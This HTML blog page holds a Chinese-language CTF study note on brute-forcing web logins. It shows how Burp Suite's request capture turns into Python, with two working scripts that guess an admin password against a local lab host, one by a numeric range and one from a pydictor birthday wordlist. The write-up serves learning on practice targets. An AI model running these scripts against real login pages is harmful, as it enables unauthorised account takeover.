  <!DOCTYPE html>
  <html lang="en"  
      data-theme-mode="auto"
  >
  <head>
  <meta charset="utf-8">
  
  
  
  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_4k4bc36ef96';window.REIMU_CONFIG.clipboard_tips = {"success":{"en":"Copy successfully (*^▽^*)"},"fail":{"en":"Copy failed (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = 'All articles on this blog are licensed under the BY-NC-SA license agreement unless otherwise stated. Please indicate the source when reprinting!';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'http://example.com';</script>
  <title>
    web学习笔记之暴力破解喵 | Dawn
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish%3A400%2C400italic%2C700%2C700italic%7CNoto+Serif+SC%3A400%2C400italic%2C700%2C700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish%3A400%2C400italic%2C700%2C700italic%7CNoto+Serif+SC%3A400%2C400italic%2C700%2C700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_4k4bc36ef96.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    
<link rel="stylesheet" href="/css/loader.css">

    <meta name="description" content="今天来学习一下暴力破解喵~bp太慢了怎么办？多半是废了  来一波曲线救国叭~在bp中安装copy as Python-requests插件，我们就可以利用python代码来进行爆破啦方法：bp中点Extensions➡BApp Store➡search查找框输入 copy as Python-requests➡install 想知道如何使用吗？话不多说，直接上栗子（题目来源于learnctf，侵权">
<meta property="og:type" content="article">
<meta property="og:title" content="web学习笔记之暴力破解喵">
<meta property="og:url" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/index.html">
<meta property="og:site_name" content="Dawn">
<meta property="og:description" content="今天来学习一下暴力破解喵~bp太慢了怎么办？多半是废了  来一波曲线救国叭~在bp中安装copy as Python-requests插件，我们就可以利用python代码来进行爆破啦方法：bp中点Extensions➡BApp Store➡search查找框输入 copy as Python-requests➡install 想知道如何使用吗？话不多说，直接上栗子（题目来源于learnctf，侵权">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/1.png">
<meta property="og:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/2.png">
<meta property="og:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/3.png">
<meta property="og:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/4.png">
<meta property="og:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/5.png">
<meta property="og:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/6.png">
<meta property="og:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/7.png">
<meta property="og:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/8.png">
<meta property="og:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/9.png">
<meta property="og:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/10.png">
<meta property="article:published_time" content="2025-11-15T08:00:00.000Z">
<meta property="article:modified_time" content="2025-11-20T04:08:44.916Z">
<meta property="article:author" content="Gloria">
<meta property="article:tag" content="Web安全">
<meta property="article:tag" content="暴力破解">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/1.png">
    <link rel="alternate" href="/atom.xml" title="Dawn" type="application/atom+xml">
    <link rel="shortcut icon" href="/images/favicon.ico">
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" as="style" onload="this.onload&#x3D;null;this.rel&#x3D;&#39;stylesheet&#39;" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL&#x2F;toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx&#x2F;1oA&#x2F;0l8ysE" crossorigin="anonymous">
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.2/dist/aos.css" integrity="sha384-GMRP93c6Hkz9JVKGAuRR3nTS7M07RwPgTFenXiosjq2VbVgvdDNcz1g6Mkj8AONa" crossorigin="anonymous">

<meta name="generator" content="Hexo 8.1.1"></head>

  <body>
      <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
      </div>
      <div class="loading-word">Loading...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var loaderEl = document.getElementById('loader');
    var startLoading = () => {
      time = Date.now();
      loaderEl.classList.remove("loading");
    }
    var hideLoader = () => {
      document.body.style.overflow = 'auto';
      loader.classList.add('loading');
    };

    var endLoading = () => {
      if (!time) {
        hideLoader();
      } else {
        if (Date.now() - time > 500) {
          time = null;
          hideLoader();
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    loaderEl.addEventListener('click', endLoading);
  </script>
<div id="copy-tooltip"></div>
<div id="heatmap-tooltip"></div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav" aria-label="Primary navigation">
        <a class="main-nav-link-wrap" href="/">
          <div class="main-nav-icon icon rotate">
              &#xe62b;
          </div>
          <span class="main-nav-link">Home</span>
        </span>
        <a class="main-nav-link-wrap" href="/archives">
          <div class="main-nav-icon icon rotate">
              &#xe62b;
          </div>
          <span class="main-nav-link">Archives</span>
        </span>
        <a class="main-nav-link-wrap" href="/about">
          <div class="main-nav-icon icon rotate">
              &#xe62b;
          </div>
          <span class="main-nav-link">About</span>
        </span>
        <a class="main-nav-link-wrap" href="/friend">
          <div class="main-nav-icon icon rotate">
              &#xe62b;
          </div>
          <span class="main-nav-link">Friend</span>
        </span>
    <a id="main-nav-toggle" class="nav-icon" aria-label="Toggle navigation" role="button"></a>
  </nav>
  <nav id="sub-nav" aria-label="Secondary navigation">
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed" aria-label="RSS Feed" target="_blank"></a>
  </nav>
</div>
<header id="header" aria-label="Site header">
    <picture></picture>
    <img  fetchpriority="high" src="/images/2.jpg" alt="web学习笔记之暴力破解喵">
  <div id="header-outer">
    <div id="header-title">
          <span id="logo">
            <h1 data-aos="slide-up">web学习笔记之暴力破解喵</h1>
          </span>
        <h2 id="subtitle-wrap" data-aos="slide-down">
        </h2>
    </div>
  </div>
</header>

        <div id="content" aria-label="Page content" class="sidebar-left"  >
          <aside id="sidebar" aria-label="Sidebar">
  <div class="sidebar-wrapper-container sticky">
  <div class="sidebar-wrapper">
    <div class="sidebar-wrap" data-aos="fade-up">
          <div class="sidebar-toc-sidebar"><h3 class="toc-title">Contents</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%8A%E5%A4%A9%E6%9D%A5%E5%AD%A6%E4%B9%A0%E4%B8%80%E4%B8%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5"><span class="toc-number">1.</span> <span class="toc-text">今天来学习一下暴力破解喵~</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#bp%E5%A4%AA%E6%85%A2%E4%BA%86%E6%80%8E%E4%B9%88%E5%8A%9E%EF%BC%9F%E5%A4%9A%E5%8D%8A%E6%98%AF%E5%BA%9F%E4%BA%86-%E6%9D%A5%E4%B8%80%E6%B3%A2%E6%9B%B2%E7%BA%BF%E6%95%91%E5%9B%BD%E5%8F%AD"><span class="toc-number">1.1.</span> <span class="toc-text">bp太慢了怎么办？多半是废了  来一波曲线救国叭~</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%9C%A8bp%E4%B8%AD%E5%AE%89%E8%A3%85copy-as-Python-requests%E6%8F%92%E4%BB%B6%EF%BC%8C%E6%88%91%E4%BB%AC%E5%B0%B1%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8python%E4%BB%A3%E7%A0%81%E6%9D%A5%E8%BF%9B%E8%A1%8C%E7%88%86%E7%A0%B4%E5%95%A6"><span class="toc-number">1.1.1.</span> <span class="toc-text">在bp中安装copy as Python-requests插件，我们就可以利用python代码来进行爆破啦</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pudictor%E6%98%AF%E4%BB%80%E4%B9%88%E5%96%B5%EF%BC%9F%E5%BF%AB%E6%9D%A5%E5%AD%A6%E5%96%B5-%E2%9D%81%C2%B4%E2%97%A1-%E2%9D%81"><span class="toc-number">1.1.2.</span> <span class="toc-text">pudictor是什么喵？快来学喵(❁´◡&#96;❁)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%92%A6%EF%BC%9F%E5%A5%BD%E5%83%8F%E6%98%AF%E8%BF%9B%E9%98%B6%E7%89%88%E7%9A%84pydictor%EF%BC%9F%E5%BF%AB%E6%9D%A5%E7%9C%8B%E7%9C%8B%E5%8F%AD"><span class="toc-number">1.1.3.</span> <span class="toc-text">咦？好像是进阶版的pydictor？快来看看叭</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Gloria%E6%80%9D%E8%80%83%E4%BA%86%E4%B8%80%E4%B8%8B%EF%BC%8C%E7%88%86%E7%A0%B4%E4%B8%8D%E4%B8%80%E5%AE%9A%E6%98%AF%E7%AE%80%E5%8D%95%E7%9A%84%E5%AF%B9%E5%AF%86%E7%A0%81%E8%BF%9B%E8%A1%8C%E7%88%86%E7%A0%B4%EF%BC%8C%E8%BF%98%E6%9C%89%E5%8F%AF%E8%83%BD%E8%BF%9E%E8%B4%A6%E6%88%B7%E5%90%8D%E9%83%BD%E4%B8%8D%E7%9F%A5%E9%81%93%E9%9C%80%E8%A6%81%E4%B8%80%E8%B5%B7%E7%88%86%E7%A0%B4%EF%BC%8C%E9%82%A3%E4%B9%88%E5%A6%82%E4%BD%95%E9%AB%98%E6%95%88%E7%9A%84%E7%88%86%E7%A0%B4%EF%BC%8C%E8%BF%99%E4%B8%80%E9%83%A8%E5%88%86%E5%9B%9E%E5%A4%B4%E4%BC%9A%E8%A1%A5%E4%B8%8A%E5%8E%BB%E7%9A%84%E5%96%B5"><span class="toc-number">1.2.</span> <span class="toc-text">Gloria思考了一下，爆破不一定是简单的对密码进行爆破，还有可能连账户名都不知道需要一起爆破，那么如何高效的爆破，这一部分回头会补上去的喵~</span></a></li></ol></li></ol>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Gloria" class="lazyload">
  <div class="sidebar-author-name">Gloria</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Post</div>
    <div class="sidebar-state-number">9</div>
  </div>
  <div class="sidebar-state-category">
    <div>Category</div>
    <div class="sidebar-state-number">3</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tag</div>
    <div class="sidebar-state-number">7</div>
  </div>
</div>
<div class="sidebar-social">
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
        <div class="sidebar-menu-icon icon rotate">
            &#xe62b;
        </div>
        <div class="sidebar-menu-link">Home</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
        <div class="sidebar-menu-icon icon rotate">
            &#xe62b;
        </div>
        <div class="sidebar-menu-link">Archives</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
        <div class="sidebar-menu-icon icon rotate">
            &#xe62b;
        </div>
        <div class="sidebar-menu-link">About</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
        <div class="sidebar-menu-icon icon rotate">
            &#xe62b;
        </div>
        <div class="sidebar-menu-link">Friend</div>
      </div>
</div>
</div>
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
    </div>
  </div>
  <div class="sidebar-widget">
  </div>
  </div>
</aside>

          <section id="main" aria-label="Main content"><article id="post-web学习笔记之暴力破解喵" class="h-entry article" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link icon-calendar" data-aos="zoom-in">
    <time datetime="2025-11-15T08:00:00.000Z" itemprop="datePublished">2025-11-15</time>
    <time style="display: none;" id="post-update-time">2025-11-20</time>
  </span>
</div>

        <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="学习笔记">学习笔记</a>
  </div>

    </div>
    
    <div class="hr-line"></div>
    
    <div class="e-content article-entry" itemprop="articleBody">
        <h2 id="今天来学习一下暴力破解喵"><a href="#今天来学习一下暴力破解喵" class="headerlink" title="今天来学习一下暴力破解喵~"></a>今天来学习一下暴力破解喵~</h2><h3 id="bp太慢了怎么办？多半是废了-来一波曲线救国叭"><a href="#bp太慢了怎么办？多半是废了-来一波曲线救国叭" class="headerlink" title="bp太慢了怎么办？多半是废了  来一波曲线救国叭~"></a>bp太慢了怎么办？<del>多半是废了</del>  来一波曲线救国叭~</h3><h4 id="在bp中安装copy-as-Python-requests插件，我们就可以利用python代码来进行爆破啦"><a href="#在bp中安装copy-as-Python-requests插件，我们就可以利用python代码来进行爆破啦" class="headerlink" title="在bp中安装copy as Python-requests插件，我们就可以利用python代码来进行爆破啦"></a>在bp中安装<strong>copy as Python-requests</strong>插件，我们就可以利用python代码来进行爆破啦</h4><p><strong>方法：</strong><br>bp中点Extensions➡BApp Store➡search查找框输入 copy as Python-requests➡install</p>
<p>想知道如何使用吗？话不多说，直接上栗子（题目来源于learnctf，侵权删）➡</p>
<img src="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/1.png" class="" title="图片正常显示了喵~">

<p>四位数密码…bp这得爆多久哇QAQ，不如我们拿python试试呢？</p>
<p><strong>步骤：</strong></p>
<p>1）先抓包➡右键点击➡选择Extensions➡选择copy as requests with session object（为什么选这个呢？因为他会保留一些登录凭证并且速度更快）</p>
<img src="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/2.png" class="" title="图片正常显示了喵~">

<p>2）打开vs code（已下载好python）➡新建一个py文件➡curl+v复制，会得到，这样我们就把这个请求转化为了python代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests <span class="comment">#import 引入一个库，requests库有很多功能，比如这里使用的发送http请求</span></span><br><span class="line"></span><br><span class="line">session = requests.session() <span class="comment">#session 可以保存一些http请求的状态</span></span><br><span class="line"></span><br><span class="line">burp0_url = <span class="string">&quot;http://192.168.154.128:32835/login.php&quot;</span> <span class="comment">#这是要访问的网页</span></span><br><span class="line">burp0_headers = &#123;<span class="string">&quot;Cache-Control&quot;</span>: <span class="string">&quot;max-age=0&quot;</span>, <span class="string">&quot;Accept-Language&quot;</span>: <span class="string">&quot;zh-CN,zh;q=0.9&quot;</span>, <span class="string">&quot;Origin&quot;</span>: <span class="string">&quot;http://192.168.154.128:32835&quot;</span>, <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;application/x-www-form-urlencoded&quot;</span>, <span class="string">&quot;Upgrade-Insecure-Requests&quot;</span>: <span class="string">&quot;1&quot;</span>, <span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36&quot;</span>, <span class="string">&quot;Accept&quot;</span>: <span class="string">&quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7&quot;</span>, <span class="string">&quot;Referer&quot;</span>: <span class="string">&quot;http://192.168.154.128:32835/&quot;</span>, <span class="string">&quot;Accept-Encoding&quot;</span>: <span class="string">&quot;gzip, deflate, br&quot;</span>, <span class="string">&quot;Connection&quot;</span>: <span class="string">&quot;keep-alive&quot;</span>&#125; <span class="comment">#这段是http请求头内容</span></span><br><span class="line">burp0_data = &#123;<span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>, <span class="string">&quot;password&quot;</span>: <span class="string">&quot;1234&quot;</span>&#125; <span class="comment">#发送的内容存在py中一个字点中</span></span><br><span class="line">session.post(burp0_url, headers=burp0_headers, data=burp0_data) <span class="comment">#使用post请求</span></span><br></pre></td></tr></table></figure>

<p>3）我们对其进行修改，以达到爆破的目的（这里要格外注意<strong>缩进</strong>！！！）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"> <span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">session = requests.session()</span><br><span class="line"></span><br><span class="line">burp0_url = <span class="string">&quot;http://192.168.154.128:32835/login.php&quot;</span></span><br><span class="line">burp0_headers = &#123;<span class="string">&quot;Cache-Control&quot;</span>: <span class="string">&quot;max-age=0&quot;</span>, <span class="string">&quot;Accept-Language&quot;</span>: <span class="string">&quot;zh-CN,zh;q=0.9&quot;</span>, <span class="string">&quot;Origin&quot;</span>: <span class="string">&quot;http://192.168.154.128:32835&quot;</span>, <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;application/x-www-form-urlencoded&quot;</span>, <span class="string">&quot;Upgrade-Insecure-Requests&quot;</span>: <span class="string">&quot;1&quot;</span>, <span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36&quot;</span>, <span class="string">&quot;Accept&quot;</span>: <span class="string">&quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7&quot;</span>, <span class="string">&quot;Referer&quot;</span>: <span class="string">&quot;http://192.168.154.128:32835/&quot;</span>, <span class="string">&quot;Accept-Encoding&quot;</span>: <span class="string">&quot;gzip, deflate, br&quot;</span>, <span class="string">&quot;Connection&quot;</span>: <span class="string">&quot;keep-alive&quot;</span>&#125;</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span> (<span class="number">1000</span>,<span class="number">10000</span>):<span class="comment">#从1000挨个试，试到9999</span></span><br><span class="line">    <span class="built_in">print</span>(i)</span><br><span class="line">    burp0_data = &#123;<span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>, <span class="string">&quot;password&quot;</span>: <span class="built_in">str</span>(i)&#125;</span><br><span class="line">    ret = session.post(burp0_url, headers=burp0_headers, data=burp0_data) <span class="comment">#把请求后的相应存在ret变量里</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;用户名或密码错误！&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> ret.text: <span class="comment">#如果‘用户名或密码错误！’不出现在响应里（这就代表把密码爆破出来了）就以字符串形式打印相应，并且终止循环，运行</span></span><br><span class="line">        <span class="built_in">print</span>(ret.text)</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>就可以得到flag了喵~</p>
<img src="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/3.png" class="" title="图片正常显示了喵~">

<h4 id="pudictor是什么喵？快来学喵-❁´◡-❁"><a href="#pudictor是什么喵？快来学喵-❁´◡-❁" class="headerlink" title="pudictor是什么喵？快来学喵(❁´◡&#96;❁)"></a>pudictor是什么喵？快来学喵(❁´◡&#96;❁)</h4><p>pydictor可以生成密码字典喵~（可在kali里面安装哦）</p>
<p>来看道题叭~</p>
<img src="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/4.png" class="" title="图片正常显示了喵~">

<p>1）大致的思路和上面的一样，但我们首先需要一个从1995年1月1日到1995年12月31日的生日密码字典，这时候就可以用到pydictor啦，我们就这样在kali里输➡_➡</p>
<img src="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/5.png" class="" title="图片正常显示了喵~">

<table>
<thead>
<tr>
<th>看最后一行：</th>
</tr>
</thead>
<tbody><tr>
<td>-plug  的意思是使用一个插件，这个插件是哪一个插件呢？</td>
</tr>
<tr>
<td>没错，就是后面跟着的birthday。我们的要求是从1995年1月1日到1995年12月31日，因此输入19950101 19951231</td>
</tr>
<tr>
<td>并且限制长度（–len）为6到8位</td>
</tr>
</tbody></table>
<p>2）然后我们使用sz命令，把我们生成的密码字典下载下来（格式为sz 要下载的文件的路径），接下来要开始转战vs code啦【图中箭头处就是我们生成的密码字典的路径】</p>
<img src="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/6.png" class="" title="图片正常显示了喵~">

<p>3）还是一样的套路，先bp抓包将请求转化为python代码，接下来爆改一下这段代码，来得到我们心爱的flag叭~o(<em>￣︶￣</em>)o</p>
<p>我们就这样写：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">session = requests.session()</span><br><span class="line"></span><br><span class="line">burp0_url = <span class="string">&quot;http://192.168.154.128:32836/login.php&quot;</span></span><br><span class="line">burp0_headers = &#123;<span class="string">&quot;Cache-Control&quot;</span>: <span class="string">&quot;max-age=0&quot;</span>, <span class="string">&quot;Accept-Language&quot;</span>: <span class="string">&quot;zh-CN,zh;q=0.9&quot;</span>, <span class="string">&quot;Origin&quot;</span>: <span class="string">&quot;http://192.168.154.128:32836&quot;</span>, <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;application/x-www-form-urlencoded&quot;</span>, <span class="string">&quot;Upgrade-Insecure-Requests&quot;</span>: <span class="string">&quot;1&quot;</span>, <span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36&quot;</span>, <span class="string">&quot;Accept&quot;</span>: <span class="string">&quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7&quot;</span>, <span class="string">&quot;Referer&quot;</span>: <span class="string">&quot;http://192.168.154.128:32836/&quot;</span>, <span class="string">&quot;Accept-Encoding&quot;</span>: <span class="string">&quot;gzip, deflate, br&quot;</span>, <span class="string">&quot;Connection&quot;</span>: <span class="string">&quot;keep-alive&quot;</span>&#125;</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;birthday_225254.txt&#x27;</span>,<span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> file: <span class="comment">#with的作用是自动在运行结束时关闭打开的文件；这里的‘r’的意思是‘读取’；as的作用是将读取到的保存在file中</span></span><br><span class="line">    <span class="keyword">for</span> line <span class="keyword">in</span> file: <span class="comment">#line的意思是每次读取一行</span></span><br><span class="line">        line = line.strip() <span class="comment">#这一行代码的意思是去除行末的换行符</span></span><br><span class="line">        <span class="built_in">print</span>(line)</span><br><span class="line">        burp0_data = &#123;<span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>, <span class="string">&quot;password&quot;</span>: line&#125;</span><br><span class="line">        response = session.post(burp0_url, headers=burp0_headers, data=burp0_data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;用户名或密码错误！&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> response.text:</span><br><span class="line">             <span class="built_in">print</span>(response.text)</span><br><span class="line">             <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p><strong>这里需要注意的是：我们可以在vscode中新建一个文件夹，然后把我们下载下来的密码字典和.py放在一起，否则我们是需要写密码字典的完整路径的（with open那一行）</strong></p>
<p>运行代码后我们就可以获得flag啦~( •̀ ω •́ )y</p>
<img src="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/7.png" class="" title="图片正常显示了喵~">

<p>Gloria好困喵，今天先写到这里叭，晚安喵~  (∪.∪ )…zzz</p>
<hr>
<p>Ok啊一觉睡到十点，我们继续叭~</p>
<h4 id="咦？好像是进阶版的pydictor？快来看看叭"><a href="#咦？好像是进阶版的pydictor？快来看看叭" class="headerlink" title="咦？好像是进阶版的pydictor？快来看看叭"></a>咦？好像是进阶版的pydictor？快来看看叭</h4><p>以一道题为栗（￣︶￣）↗　（来源于learnctf，侵权删）</p>
